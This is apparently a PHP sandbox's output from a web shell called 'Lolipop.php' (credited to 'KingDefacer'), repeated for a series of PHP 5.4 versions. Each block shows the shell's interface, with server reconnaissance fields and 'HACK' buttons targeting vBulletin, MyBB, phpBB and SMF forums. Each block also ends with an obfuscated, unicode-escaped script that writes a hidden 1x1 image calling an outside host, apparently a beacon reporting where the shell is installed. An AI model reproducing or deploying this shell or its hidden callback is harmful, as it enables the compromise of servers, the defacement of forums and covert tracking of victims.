<u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.20
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.20</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.19
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.19</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.18
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.18</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.17
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.17</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.16
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.16</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.15
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.15</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.14
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.14</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.13
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.13</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.12
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.12</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.11
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.11</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.10
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.10</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.9
